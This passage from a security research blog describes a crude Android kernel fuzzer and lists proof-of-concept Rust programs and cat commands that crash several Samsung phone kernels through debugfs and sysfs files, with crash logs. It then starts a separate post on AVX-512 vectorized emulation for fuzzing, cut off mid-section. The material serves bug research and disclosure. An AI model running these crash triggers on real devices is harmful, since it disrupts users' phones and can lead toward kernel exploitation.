TIF_FOREIGN_FPSTATE: 0, FP/SIMD depth 0, cpu: 0
CPU: 1 MPIDR: 80000101 PID: 3944 Comm: Binder:3781_3 Tainted: G        W       4.4.111-14315050-QB19732135 #1
Hardware name: Samsung DREAMLTE EUR rev06 board based on EXYNOS8895 (DT)
task: ffffffc863c00000 task.stack: ffffffc863938000
PC is at kmem_cache_alloc_trace+0xac/0x210
LR is at binder_alloc_new_buf_locked+0x30c/0x4a0
pc : [<ffffff800826f254>] lr : [<ffffff80089e2e50>] pstate: 60000145
sp : ffffffc86393b960
[<ffffff800826f254>] kmem_cache_alloc_trace+0xac/0x210
[<ffffff80089e2e50>] binder_alloc_new_buf_locked+0x30c/0x4a0
[<ffffff80089e3020>] binder_alloc_new_buf+0x3c/0x5c
[<ffffff80089deb18>] binder_transaction+0x7f8/0x1d30
[<ffffff80089e0938>] binder_thread_write+0x8e8/0x10d4
[<ffffff80089e11e0>] binder_ioctl_write_read+0xbc/0x2ec
[<ffffff80089e15dc>] binder_ioctl+0x1cc/0x618
[<ffffff800828b844>] do_vfs_ioctl+0x58c/0x668
[<ffffff800828b980>] SyS_ioctl+0x60/0x8c
[<ffffff800815108c>] __sys_trace_return+0x0/0x4

Ah cool, derefing 00662625, my favorite kernel address! Looks like it’s some form of heap corruption. We could probably exploit this, especially since if we mapped in 0x00662625 we would get control of a kernel-land object from userland. It would require the right groom. This specific bug has been minimized and you can find a targeted PoC in the Wall of Shame section.

Using the “fuzzer”

You’d think this fuzzer is pretty trivial to run, but there are some things that can really help it along. Especially on phones which seem to fight back a bit.

Protips:

  • Restart fuzzer regularly, it gets stuck a lot
  • Do random things on the phone like browsing or using the camera to generate kernel activity
  • Kill the app and unplug the ADB USB cable frequently, this can cause some of the bugs to trigger when the application suddenly dies
  • Tweak the MAX_THREADS value from low values to high values
  • Create blacklists for files which are known to block forever on reads

Using the above protips I’ve been able to get this fuzzer to work on almost every phone I have encountered in the past 4 years, with dwindling success as selinux policies get stricter.

Next device

Okay so we’ve looked at the latest Galaxy S8, let’s try to look at an older Galaxy S5 (G900FXXU1CRH1). Whelp, that one crashed even faster. However if we try to get /proc/last_kmsg we will discover that this file does not exist. We can also try using a fancy UART cable over USB with the magic 619k resistor and daemonize() the application so we can observe the crash over that. However that didn’t work in this case either (honestly not sure why, I get dmesg output but no panic log).

So now we have this problem. How do we root cause this bug? Well, we can do a binary search of the filesystem and blacklist files in certain folders and try to whittle it down. Let’s give that a shot!

First let’s only allow use of /sys/* and beyond; all other files will be disallowed. Typically the bugs this fuzzer finds come from sysfs and procfs. We’ll do this by changing the directory listing call to listdirs(Path::new("/sys"), &mut dirlisting);

Woo, it worked! Crashed faster, and this time we limited to /sys. So we know the bug exists somewhere in /sys.

Now we’ll go deeper in /sys, maybe we try /sys/devices… oops, no luck. We’ll have to try another. Maybe /sys/kernel?… WINNER WINNER!

So we’ve whittled it down further to /sys/kernel/debug but now there are 85 folders in this directory. I really don’t want to manually try all of them. Maybe we can improve our fuzzer?

Improving the fuzzer

So currently we have no idea which files were touched to cause the crash. We can print them and then view them over ADB, however this doesn’t sync when the phone panics… we need something even better.

Perhaps we should just send the filenames we’re fuzzing over the network and then have a service that acks the filenames, such that the files are not touched unless they have been confirmed to be reported over the wire. Maybe this would be too slow? Hard to say. Let’s give it a go!

We’ll make a quick server in Rust to run on our host, and then let the phone connect to this server over ADB USB via adb reverse tcp:13370 tcp:13370, which will forward connections to 127.0.0.1:13370 on the phone to our host where our program is running and will log filenames.

Designing a terrible protocol

We need a quick protocol that works over TCP to send filenames. I’m thinking something super easy. Send the filename, and then the server responds with “ACK”. We’ll just ignore threading issues and the fact that heap corruption bugs will usually show up after the file was accessed. We don’t want to get too carried away and make a reasonable fuzzer, eh?

use std::net::TcpListener;
use std::io::{Read, Write};

fn main() -> std::io::Result<()> {
    let listener = TcpListener::bind("0.0.0.0:13370")?;

    let mut buffer = vec![0u8; 64 * 1024];

    for stream in listener.incoming() {
        print!("Got new connection\n");

        let mut stream = stream?;

        loop {
            if let Ok(bread) = stream.read(&mut buffer) {
                // Connection closed, break out
                if bread == 0 {
                    break;
                }

                // Send acknowledge
                stream.write(b"ACK").expect("Failed to send ack");
                stream.flush().expect("Failed to flush");

                let string = std::str::from_utf8(&buffer[..bread])
                    .expect("Invalid UTF-8 character in string");
                print!("Fuzzing: {}\n", string);
            } else {
                // Failed to read, break out
                break;
            }
        }
    }

    Ok(())
}

This server is pretty trash, but it’ll do. It’s a fuzzer anyways, can’t find bugs without buggy code.

Client side

From the phone we just implement a simple function:

// Connect to the server we report to and pass this along to the functions
// and threads that need socket access
let stream = Arc::new(Mutex::new(TcpStream::connect("127.0.0.1:13370")
    .expect("Failed to open TCP connection")));

fn inform_filename(handle: &Mutex<TcpStream>, filename: &str) {
    // Report the filename
    let mut socket = handle.lock().expect("Failed to lock mutex");
    socket.write_all(filename.as_bytes()).expect("Failed to write");
    socket.flush().expect("Failed to flush");

    // Wait for an ACK
    let mut ack = [0u8; 3];
    socket.read_exact(&mut ack).expect("Failed to read ack");
    assert!(&ack == b"ACK", "Did not get ACK as expected");
}
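In the fuzz worker we then call this right before touching a file, so a path is only accessed after the server has acknowledged it. Something along these lines, assuming the worker is handed a clone of the Arc:

// Report the path and wait for the ACK before opening it for fuzzing
inform_filename(&stream, path.to_str().unwrap());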

Developing blacklist

Okay so now we have a log of all files we’re fuzzing, and they’re confirmed by the server so we don’t lose anything. Let’s set it into single-threaded mode so we don’t have to worry about race conditions for now.

We’ll see it frequently gets hung up on files. We’ll make note of the files it gets hung up on and start developing a blacklist. This takes some manual labor, and usually there are a handful (5-10) files we need to put in this list. I typically make my blacklist based on the start of a filename, thus I can blacklist entire directories based on starts_with matching.
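A minimal sketch of such a prefix-based blacklist, used to filter the directory listing before fuzzing (the entry shown is just an illustrative example of a family of files that blocks forever):

// Hypothetical prefix blacklist; entries come from manually noting which
// files the fuzzer hangs on
const BLACKLIST: &[&str] = &[
    "/sys/kernel/debug/tracing/",
];

/// Returns true if `path` starts with any blacklisted prefix and should be
/// skipped by the fuzzer
fn is_blacklisted(path: &std::path::Path) -> bool {
    let path = path.to_string_lossy();
    BLACKLIST.iter().any(|&prefix| path.starts_with(prefix))
}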

Back to fuzzing

So when fuzzing the last file we saw touched was /sys/kernel/debug/smp2p_test/ut_remote_gpio_inout before a crash.

Let’s hammer this in a loop… and it worked! So now we can develop a fully self-contained PoC:

use std::fs::File;
use std::io::Read;

fn thrasher() {
    // Buffer to read into
    let mut buf = [0x41u8; 8192];

    let path = "/sys/kernel/debug/smp2p_test/ut_remote_gpio_inout";

    loop {
        if let Ok(mut fd) = File::open(path) {
            let _ = fd.read(&mut buf);
        }
    }
}

fn main() {
    // Make fuzzing threads
    let mut threads = Vec::new();
    for _ in 0..4 {
        threads.push(std::thread::spawn(move || thrasher()));
    }

    // Wait for all threads to exit
    for thr in threads {
        let _ = thr.join();
    }
}

What a top tier PoC!

Next bug?

So now that we have root caused the bug, we should blacklist the specific file we know caused the bug and try again. Potentially this bug was hiding another.

Nope, nothing else, the S5 is officially secure and fixed of all bugs.

The end of an era

Sadly this fuzzer is on the way out. It used to work almost universally on every phone, and still does if selinux is set to permissive. But sadly as time has gone on these bugs have become hidden behind selinux policies that prevent them from being reached. It now only works on a few phones that I have rather than all of them, but the fact that it ever worked is probably the best part of it all.

There is a lot that could be done to improve this fuzzer, but the goal of this article was to make a terrible fuzzer, not a reasonable one. The big things to add to make it better:

  • Make it perform random ioctl() calls
  • Make it attempt to mmap() and use the mappings for these devices
  • Actually understand what the file expects
  • Use multiple processes or something to let the fuzzer continue to run when it gets stuck
  • Run it for more than 1 minute before giving up on a phone
  • Make better blacklists/whitelists

In the future maybe I’ll exploit one of these bugs in another blog, or root cause them in source.

Wall of Shame

Try it out on your own test phones (not on your actual phone, that’d probably be a bad idea). Let me know if you have any silly bugs found by this to add to the wall of shame.

G900F (Exynos Galaxy S5) [G900FXXU1CRH1] (August 1, 2017)

PoC

use std::fs::File;
use std::io::Read;

fn thrasher() {
    // Buffer to read into
    let mut buf = [0x41u8; 8192];

    let path = "/sys/kernel/debug/smp2p_test/ut_remote_gpio_inout";

    loop {
        if let Ok(mut fd) = File::open(path) {
            let _ = fd.read(&mut buf);
        }
    }
}

fn main() {
    // Make fuzzing threads
    let mut threads = Vec::new();
    for _ in 0..4 {
        threads.push(std::thread::spawn(move || thrasher()));
    }

    // Wait for all threads to exit
    for thr in threads {
        let _ = thr.join();
    }
}

J200H (Galaxy J2) [J200HXXU0AQK2] (August 1, 2017)

not root caused, just run the fuzzer

[c0] Unable to handle kernel paging request at virtual address 62655726
[c0] pgd = c0004000
[c0] [62: ee456000
[c0] PC is at devres_for_each_res+0x68/0xdc
[c0] LR is at 0x62655722
[c0] pc : [<c0302848>]    lr : [<62655722>]    psr: 000d0093
sp : ee457d20  ip : 00000000  fp : ee457d54
[c0] r10: ed859210  r9 : c0c833e4  r8 : ed859338
[c0] r7 : ee456000
[c0] PC is at devres_for_each_res+0x68/0xdc
[c0] LR is at 0x62655722
[c0] pc : [<c0302848>]    lr : [<62655722>]    psr: 000d0093
[c0] [<c0302848>] (devres_for_each_res+0x68/0xdc) from [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118)
[c0] [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118) from [<c0306050>] (dpm_for_each_dev+0x4c/0x6c)
[c0] [<c0306050>] (dpm_for_each_dev+0x4c/0x6c) from [<c030d824>] (fw_pm_notify+0xe4/0x100)
[c0] [<c030d0013 00000000 ffffffff ffffffff
[c0] [<c0302848>] (devres_for_each_res+0x68/0xdc) from [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118)
[c0] [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118) from [<c0306050>] (dpm_for_each_dev+0x4c/0x6c)
[c0] [<c0306050>] (dpm_for_each_dev+0x4c/0x6c) from [<c030d824>] (fw_pm_notify+0xe4/0x100)
[c0] [<c030d[<c0063824>] (pm_notifier_call_chain+0x28/0x3c)
[c0] [<c0063824>] (pm_notifier_call_chain+0x28/0x3c) from [<c00644a0>] (pm_suspend+0x154/0x238)
[c0] [<c00644a0>] (pm_suspend+0x154/0x238) from [<c00657bc>] (suspend+0x78/0x1b8)
[c0] [<c00657bc>] (suspend+0x78/0x1b8) from [<c003d6bc>] (process_one_work+0x160/0x4b8)
[c0] [<c003d6bc>] [<c0063824>] (pm_notifier_call_chain+0x28/0x3c)
[c0] [<c0063824>] (pm_notifier_call_chain+0x28/0x3c) from [<c00644a0>] (pm_suspend+0x154/0x238)
[c0] [<c00644a0>] (pm_suspend+0x154/0x238) from [<c00657bc>] (suspend+0x78/0x1b8)
[c0] [<c00657bc>] (suspend+0x78/0x1b8) from [<c003d6bc>] (process_one_work+0x160/0x4b8)

J500H (Galaxy J5) [J500HXXU2BQI1] (August 1, 2017)

cat /sys/kernel/debug/usb_serial0/readstatus

or

cat /sys/kernel/debug/usb_serial1/readstatus

or

cat /sys/kernel/debug/usb_serial2/readstatus

or

cat /sys/kernel/debug/usb_serial3/readstatus

J500H (Galaxy J5) [J500HXXU2BQI1] (August 1, 2017)

cat /sys/kernel/debug/mdp/xlog/dump

J500H (Galaxy J5) [J500HXXU2BQI1] (August 1, 2017)

cat /sys/kernel/debug/rpm_master_stats

J700H (Galaxy J7) [J700HXXU3BRC2] (August 1, 2017)

not root caused, just run the fuzzer

Unable to handle kernel paging request at virtual address ff00000107
pgd = ffffffc03409d000
[ff00000107] *pgd=0000000000000000
mms_ts 9-0048: mms_sys_fw_update [START]
mms_ts 9-0048: mms_fw_update_from_storage [START]
mms_ts 9-0048: mms_fw_update_from_storage [ERROR] file_open - path[/sdcard/melfas.mfsb]
mms_ts 9-0048: mms_fw_update_from_storage [ERROR] -3
mms_ts 9-0048: mms_sys_fw_update [DONE]
muic-universal:muic_show_uart_sel AP
usb: enable_show dev->enabled=1
sm5703-fuelga0000000000000000
Kernel BUG at ffffffc00034e124 [verbose debug info unavailable]
Internal error: Oops - BUG: 96000004 [#1] PREEMPT SMP
exynos-snapshot: item - log_kevents is disabled
CPU: 4 PID: 9022 Comm: lulandroid Tainted: G        W    3.10.61-8299335 #1
task: ffffffc01049cc00 ti: ffffffc002824000 task.ti: ffffffc002824000
PC is at sysfs_open_file+0x4c/0x208
LR is at sysfs_open_file+0x40/0x208
pc : [<ffffffc00034e124>] lr : [<ffffffc00034e118>] pstate: 60000045
sp : ffffffc002827b70

G920F (Exynos Galaxy S6) [G920FXXU5DQBC] (February 1, 2017) Now gated by selinux :(

sec_debug_store_fault_addr 0xffffff80000fe008
Unhandled fault: synchronous external abort (0x96000010) at 0xffffff80000fe008
------------[ cut here ]------------
Kernel BUG at ffffffc0003b6558 [verbose debug info unavailable]
Internal error: Oops - BUG: 96000010 [#1] PREEMPT SMP
exynos-snapshot: core register saved(CPU:0)
CPUMERRSR: 0000000012100088, L2MERRSR: 00000000111f41b8
exynos-snapshot: context saved(CPU:0)
exynos-snapshot: item - log_kevents is disabled
CPU: 0 PID: 5241 Comm: hookah Tainted: G        W      3.18.14-9519568 #1
Hardware name: Samsung UNIVERSAL8890 board based on EXYNOS8890 (DT)
task: ffffffc830513000 ti: ffffffc822378000 task.ti: ffffffc822378000
PC is at samsung_pin_dbg_show_by_type.isra.8+0x28/0x68
LR is at samsung_pinconf_dbg_show+0x88/0xb0
Call trace:
[<ffffffc0003b6558>] samsung_pin_dbg_show_by_type.isra.8+0x28/0x68
[<ffffffc0003b661c>] samsung_pinconf_dbg_show+0x84/0xb0
[<ffffffc0003b66d8>] samsung_pinconf_group_dbg_show+0x90/0xb0
[<ffffffc0003b4c84>] pinconf_groups_show+0xb8/0xec
[<ffffffc0002118e8>] seq_read+0x180/0x3ac
[<ffffffc0001f29b8>] vfs_read+0x90/0x148
[<ffffffc0001f2e7c>] SyS_read+0x44/0x84

G950F (Exynos Galaxy S8) [G950FXXU4CRI5] (September 1, 2018)

Can crash by getting PC in the kernel. Probably a race condition heap corruption. Needs a groom.

(This PC crash is old, since it’s corruption this is some old repro from an unknown version, probably April 2018 or so)

task: ffffffc85f672880 ti: ffffffc8521e4000 task.ti: ffffffc8521e4000
PC is at jopp_springboard_blr_x2+0x14/0x20
LR is at seq_read+0x15c/0x3b0
pc : [<ffffffc000c202b0>] lr : [<ffffffc00024a074>] pstate: a0000145
sp : ffffffc8521e7d20
x29: ffffffc8521e7d30 x28: ffffffc8521e7d90
x27: ffffffc029a9e640 x26: ffffffc84f10a000
x25: ffffffc8521e7ec8 x24: 00000072755fa348
x23: 0000000080000000 x22: 0000007282b8c3bc
x21: 0000000000000e71 x20: 0000000000000000
x19: ffffffc029a9e600 x18: 00000000000000a0
x17: 0000007282b8c3b4 x16: 00000000ff419000
x15: 000000727dc01b50 x14: 0000000000000000
x13: 000000000000001f x12: 00000072755fa1a8
x11: 00000072755fa1fc x10: 0000000000000001
x9 : ffffffc858cc5364 x8 : 0000000000000000
x7 : 0000000000000001 x6 : 0000000000000001
x5 : ffffffc000249f18 x4 : ffffffc000fcace8
x3 : 0000000000000000 x2 : ffffffc84f10a000
x1 : ffffffc8521e7d90 x0 : ffffffc029a9e600

PC: 0xffffffc000c20230:
0230  128001a1 17fec15d 128001a0 d2800015 17fec46e 128001b4 17fec62b 00000000
0250  01bc8a68 ffffffc0 d503201f a9bf4bf0 b85fc010 716f9e10 712eb61f 54000040
0270  deadc0de a8c14bf0 d61f0000 a9bf4bf0 b85fc030 716f9e10 712eb61f 54000040
0290  deadc0de a8c14bf0 d61f0020 a9bf4bf0 b85fc050 716f9e10 712eb61f 54000040
02b0  deadc0de a8c14bf0 d61f0040 a9bf4bf0 b85fc070 716f9e10 712eb61f 54000040
02d0  deadc0de a8c14bf0 d61f0060 a9bf4bf0 b85fc090 716f9e10 712eb61f 54000040
02f0  deadc0de a8c14bf0 d61f0080 a9bf4bf0 b85fc0b0 716f9e10 712eb61f 54000040
0310  deadc0de a8c14bf0 d61f00a0 a9bf4bf0 b85fc0d0 716f9e10 712eb61f 54000040

PoC

extern crate rand;

use std::fs::File;
use std::io::Read;

fn thrasher() {
    // These are the 2 files we want to fuzz
    let random_paths = [
        "/sys/devices/platform/battery/power_supply/battery/mst_switch_test",
        "/sys/devices/platform/battery/power_supply/battery/batt_wireless_firmware_update"
    ];

    // Buffer to read into
    let mut buf = [0x41u8; 8192];

    loop {
        // Pick a random file
        let file = &random_paths[rand::random::<usize>() % random_paths.len()];

        // Read a random number of bytes from the file
        if let Ok(mut fd) = File::open(file) {
            let rsz = rand::random::<usize>() % (buf.len() + 1);
            let _ = fd.read(&mut buf[..rsz]);
        }
    }
}

fn main() {
    // Make fuzzing threads
    let mut threads = Vec::new();
    for _ in 0..4 {
        threads.push(std::thread::spawn(move || thrasher()));
    }

    // Wait for all threads to exit
    for thr in threads {
        let _ = thr.join();
    }
}

Vectorized Emulation: Hardware accelerated taint tracking at 2 trillion instructions per second

14 October 2018 at 21:37

This is the introduction to a multipart series. It gives a high-level overview without deeply diving into any individual component.

Read the next post in the series: MMU Design

Vectorized emulation, why do I do this to myself?

Why

Changelog

Date Info
2018-10-14 Initial

Tweeter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up, or I think you can use RSS or something if you’re still one of those people.

Performance disclaimer

All benchmarks done here are on a single Xeon Phi 7210 with 96 GiB of RAM. This comes out to about $4k USD, but if you cheap out on RAM and buy used Phis you could probably get the same setup for $1k USD.

This machine has 64 cores and 256 hardware threads. Using AVX-512 I run 4096 32-bit VMs at a time ((512 / 32) * 256).

All performance numbers in this article refer to the machine running at 100% on all cores.

Terminology

Term Inology
Lane A single component in a larger vector (often 32-bit throughout this document)
VM A single VM, in terms of vectorized emulation it refers to a single lane of a vector

Intro

In this blog I’m going to introduce you to a concept I’ve been working on for almost 2 years now. Vectorized emulation. The goal is to take standard applications and JIT them to their AVX-512 equivalent such that we can fuzz 16 VMs at a time per thread. The net result of this work allows for high performance fuzzing (approx 40 billion to 120 billion instructions per second [the 2 trillion clickbait number is theoretical maximum]) depending on the target, while gathering differential coverage on code, register, and memory state.

By gathering more than just code coverage we are able to track state of code deeper than just code coverage itself, allowing us to fuzz through things like memcmp() without any hooks or static analysis of the target at all.

Further since we’re running emulated code we are able to run a soft MMU implementation which has byte-level permissions. This gives us stronger-than-ASAN memory protections, making bugs fail faster and cleaner.

How it came to be an idea

My history with fuzzing tools starts off effectively with my hypervisor for fuzzing, falkervisor. falkervisor served me well for quite a long time, but my work rotated more towards non-x86 targets, which it did not support. With a demand for emulation I made modifications to QEMU for high-performance fuzzing, and ultimately swapped out their MMU implementation for my own which has byte-level permissions. This new byte-level permission model allowed me to catch even the smallest memory corruptions, leading to finding pretty fun bugs!

More and more after working with QEMU I got annoyed. It’s designed for whole systems yet I was using it for fuzzing targets that were running with unknown hardware and running from dynamically dumped memory snapshots. Due to the level of abstraction in QEMU I started to get concerned with the potential unknowns that would affect the instrumentation and fuzzing of targets.

I developed my first MIPS emulator. It was not designed for performance, but rather purely for simple usage and perfect single stepping. You step an instruction, registers and memory get updated. No JIT, no intermediate registers, no flushing or weird block level translation changes. I eventually made a JIT for this that maintained the flush-state-every-instruction model and successfully used it against multiple targets. I also developed an ARM emulator somewhere in this timeframe.

When early 2017 rolls around I’m bored and want to buy a Xeon Phi. Who doesn’t want a 64-core 256-thread single processor? I really had no need for the machine so I just made up some excuse in my head that the high bandwidth memory on die would make reverting snapshots faster. Yeah… like that really matters? Oh well, I bought it.

While the machine was on the way I had this idea… when fuzzing from a snapshot all VMs initially start off fuzzing with the exact same state, except for maybe an input buffer and length being changed. Thus they do identical operations until user-controlled data is processed. I’ve done some fun vectorization work before, but what got me thinking is why not just emit vpaddd instead of add when JITting, and now I can run 16 VMs at a time!

Alas… the idea was born

A primer on snapshot fuzzing

Snapshot fuzzing is fundamental to this work and almost all fuzzing work I have done from 2014 and beyond. It warrants its own blog entirely.

Snapshot fuzzing is a method of fuzzing where you start from a partially-executed system state. For example I can run an application under GDB, like a parser, put a breakpoint after the file/network data has been read, and then dump memory and register state to a core dump using gcore. At this point I have full memory and register state for the application. I can then load up this core dump into any emulator, set up memory contents and permissions, set up register state, and continue execution. While this is an example with core dumps on Linux, this methodology works the same whether the snapshot is a core dump from GDB, a minidump on Windows, or even an exotic memory dump taken from an exploit on a locked-down device like a phone.

All that matters is that I have memory state and register state. From this point I can inject/modify the file contents in memory and continue execution with a new input!

It can get a lot more complex when dealing with kernel state, like file handles, network packets buffered in the kernel, and really anything that involves syscalls. However in most targets you can make some custom rigging using strace to know which FDs line up, where they are currently seeked, etc. Further, a full system snapshot can be used instead of a single application, and then this kernel state is no longer a concern.

The benefits of snapshot fuzzing are performance (linear scaling), high levels of introspection (even without source or symbols), and most importantly… determinism. Unless the emulator has bugs snapshot fuzzing is typically deterministic (sometimes relaxed for performance). Find some super exotic race condition while snapshot fuzzing? Well, you can single step through with the same input and now you can look at the trace as a human, even if it’s a 1 in a billion chance of hitting.

A primer on vectorized instruction sets

Since the 90s many computer architectures have some form of SIMD (vectorized) instruction set. SIMD stands for single instruction multiple data. This means that a single instruction performs an operation (typically the same) on multiple different pieces of data. SIMD instruction sets fall under names like MMX, SSE, AVX, AVX512 for x86, NEON for ARM, and AltiVec for PPC. You’ve probably seen these instructions if you’ve ever looked at a memcpy() implementation on any 64-bit x86 system. They’re the ones with the gross 15 character mnemonics and registers you didn’t even know existed.

For a simple case lets talk about standard SSE on x86. Since x86_64 started with the Pentium 4 and the Pentium 4 had up to SSE3 implementations, almost any x86_64 compiler will generate SSE instructions as they’re always valid on 64-bit systems.

SSE provides 128-bit SIMD operations to x86. SSE introduced 16 128-bit registers named xmm0 through xmm15 (only 8 xmm registers on 32-bit x86). These 128-bit registers can be treated as groups of different sized smaller pieces of data which sum up to 128 bits.

  • 4 single precision floats
  • 2 double precision floats
  • 2 64-bit integers
  • 4 32-bit integers
  • 8 16-bit integers
  • 16 8-bit integers

Now with a single instruction it is possible to perform the same operation on multiple floats or integers. For example there is an instruction paddd, which stands for packed add dwords. This means that the 128-bit registers provided are treated as 4 32-bit integers, and an add operation is performed.

Here’s a real example, adding xmm0 and xmm1 together treating them as 4 individual 32-bit integer lanes and storing them back into xmm0

paddd xmm0, xmm1

Register Dword 1 Dword 2 Dword 3 Dword 4
xmm0 5 6 7 8
xmm1 10 20 30 40
xmm0 (result) 15 26 37 48

Cool. Starting with AVX these registers were expanded to 256-bits thus allowing twice the throughput per instruction. These registers are named ymm0 through ymm15. Further AVX introduced three operand form instructions which allow storing a result to a different register than the ones being used in the operation. For example you can do vpaddd ymm0, ymm1, ymm2 which will add the 8 individual 32-bit integers in ymm1 and ymm2 and store the result into ymm0. This helps a lot with register scheduling and prevents many unnecessary movs just to save off registers before they are clobbered.

AVX-512

AVX-512 is a continuation of x86’s SIMD model by expanding from 16 256-bit registers to 32 512-bit registers. These registers are named zmm0 through zmm31. Further AVX-512 introduces 8 new kmask registers named k0 through k7 where k0 has a special meaning.

The kmask registers are used to perform masking on instructions, either by merging or zeroing. This makes it possible to loop through data and process it while having conditional masking to disable operations on a given lane of the vector.

The syntax for the common instructions using kmasks are the following:

vpaddd zmm0 {k1}, zmm1, zmm2

chart simplified to show 4 lanes instead of 16

Register Dword 1 Dword 2 Dword 3 Dword 4
zmm0 9 9 9 9
zmm1 1 2 3 4
zmm2 10 20 30 40
k1 1 0 1 1
zmm0 (result) 11 9 33 44

or

vpaddd zmm0 {k1}{z}, zmm1, zmm2

chart simplified to show 4 lanes instead of 16

Register Dword 1 Dword 2 Dword 3 Dword 4
zmm0 9 9 9 9
zmm1 1 2 3 4
zmm2 10 20 30 40
k1 1 0 1 1
zmm0 (result) 11 0 33 44

The first example uses k1 as the kmask for the add operation. In this case the k1 register is treated as a 16-bit number, where each bit corresponds to each of the 16 32-bit lanes in the 512-bit register. If the corresponding bit in k1 is zero, then the add operation is not performed and that lane is left unchanged in the resultant register.

In the second example there is a {z} suffix on the kmask register selection, this means that the operation is performed with zeroing rather than merging. If the corresponding bit in k1 is zero then the resultant lane is zeroed out rather than left unchanged. This gets rid of a dependency on the previous register state of the result and thus is faster, however it might not be suitable for all applications.

The k0 mask is implicit and does not need to be specified. The k0 register is hardwired to having all bits set, thus the operation is performed on all lanes unconditionally.

Prior to AVX-512, compare instructions in SIMD typically yielded all ones in a given lane if the comparison was true, or all zeroes if it was false. In AVX-512, comparison instructions are done using kmasks.

vpcmpgtd k2 {k1}, zmm10, zmm11

You may have seen this instruction in the picture at the start of the blog. What this instruction does is compare the 16 dwords in zmm10 with the 16 dwords in zmm11, and only performs the compare on lanes enabled by k1, and stores the result of the compare into k2. If the lane was disabled due to k1 then the corresponding bit in the k2 result will be zero. Meaning the only set bits in k2 will be from enabled lanes which were greater in zmm10 than in zmm11. Phew.

Vectorized emulation

Now that you’ve made it this far you might already have some gears turning in your head telling you where this might be going next.

Since with snapshot fuzzing we start executing the same code, we are doing the same operations. This means we can convert the x86 instructions to their vectorized counterparts and run 16 VMs at a time rather than just one.

Let’s make up a fake program:

mov eax, 5
mov ebx, 10
add eax, ebx
sub eax, 20

How can we vectorize this code?

; Register allocation:
; eax = zmm0
; ebx = zmm1

vpbroadcastd zmm0, dword ptr [memory containing constant 5]
vpbroadcastd zmm1, dword ptr [memory containing constant 10]
vpaddd       zmm0, zmm0, zmm1
vpsubd       zmm0, zmm0, dword ptr [memory containing constant 20] {1to16}

Well that was kind of easy. We’ve got a few new AVX concepts here. We’re using the vpbroadcastd instruction to broadcast a dword value to all lanes of a given ZMM register. Since the Xeon Phi is bottlenecked on the instruction decoder it’s actually faster to load from memory than it is to load an immediate into a GPR, move this into a XMM register, and then broadcast it out.

Further we introduce the {1to16} broadcasting that AVX-512 offers. This allows us to use a single dword constant directly, as in our vpsubd example. It broadcasts the dword pointed to in memory to all 16 lanes and then performs the operation. This saves one instruction as we don’t need an explicit vpbroadcastd.

In this case if we executed this code with any VM state we will have no divergence (no VMs do anything different), thus this example is very easy. It’s pretty much a 1-to-1 translation of the non-vectorized x86 to vectorized x86.

Alright, let’s try one a bit more complex, this time let’s work with VMs in different states:

add eax, 10

becomes

; Register allocation:
; eax = zmm0

vpaddd zmm0, zmm0, dword ptr [memory containing constant 10] {1to16}

Let’s imagine that the value in eax prior to execution is different, let’s say it’s [1, 2, 3, 4] for 4 different VMs (simplified, in reality there are 16).

Register Dword 1 Dword 2 Dword 3 Dword 4
zmm0 1 2 3 4
const 10 10 10 10
zmm0 (result) 11 12 13 14

Oh? This is exactly what AVX is supposed to do… so it’s easy?

Okay it’s not that easy

So you might have noticed we’ve dodged a few things here that are hard. First we’ve ignored memory operations, and second we’ve ignored branches.

Let’s talk a bit about AVX memory

With AVX-512 we can load and store directly from/to memory, and ideally this memory is aligned as 512-bit registers are whole 64-byte cache lines. In AVX-512 we use the vmovdqa32 instruction. This will load an entire aligned 64-byte piece of memory into a ZMM register ala vmovdqa32 zmm0, [memory], and we can store with vmovdqa32 [memory], zmm0. Further when using kmasks with vmovdqa32 for loads the corresponding lane is left unmodified (merge masking) or zeroed (zero masking). For stores the value is simply not written if the corresponding mask bit is zero.

That’s pretty easy. But this doesn’t really work well when we have 16 unique VMs we’re running with unique address spaces.

… or does it?

VM memory interleaving

Since most VM memory operations are not affected by user input, and thus are the same in all VMs, we need a way to organize the 16 VMs memory such that we can access them all quickly. To do this we actually interleave all 16 VMs at the dword level (32-bit). This means we can perform a single vmovdqa32 to load or store to memory for all 16 VMs as long as they’re accessing the same address.

This is pretty simple, just interleave at the dword level:

chart simplified to show 4 lanes instead of 16

Guest Address Host Address Dword 1 Dword 2 Dword 3 Dword 16
0x0000 0x0000 1 2 3 33
0x0004 0x0040 32 74 55 45
0x0008 0x0080 24 24 24 24

All we need to do is take the guest address, multiply it by 16, and then vmovdqa32 from/to that address. It once again does not matter what the contents of the memory are for each VM and they can differ. The vmovdqa32 does not care about the memory contents.

In reality the host address is not just the guest address multiplied by 16 as we need some translation layer. But that will get its own entire blog. For now let’s just assume a flat, infinite memory model where we can just multiply by 16.

So what are the limitations of this model?

Well when reading bytes we must read the whole dword value and then shift and mask to extract the specific byte. When writing a byte we need to read the memory first, shift, mask, and or in the new byte, and write it out. And when doing non-aligned operations we need to perform multiple memory operations and combine the values via shifting and masking. Luckily compilers (and programmers) typically avoid these unaligned operations and they’re rare enough to not matter much.
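To make the simplified model concrete, here is a small sketch of where a lane’s dword lives and how a single byte read falls out of it, assuming the flat multiply-by-16 model above and little-endian dwords (names are made up for illustration):

/// Host offset of the dword at 4-byte-aligned guest address `guest_addr`
/// for VM lane `lane` (0..16)
fn host_offset(guest_addr: u32, lane: usize) -> usize {
    assert!(guest_addr % 4 == 0 && lane < 16);
    guest_addr as usize * 16 + lane * 4
}

/// Read a single guest byte for one lane: load the containing interleaved
/// dword, then shift and mask out the byte we want
fn read_byte(host: &[u8], guest_addr: u32, lane: usize) -> u8 {
    let off = host_offset(guest_addr & !3, lane);
    let dword = u32::from_le_bytes([host[off], host[off + 1], host[off + 2], host[off + 3]]);
    (dword >> ((guest_addr & 3) * 8)) as u8
}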

Divergence

So far everything we have talked about does not care about the values it is operating on at all, thus everything has been easy so far. But in reality values do matter. There are 3 places where divergence matters in this entire system:

  • Loads/stores with different addresses
  • Branches
  • Exceptions/faults

Loads/stores with different addresses

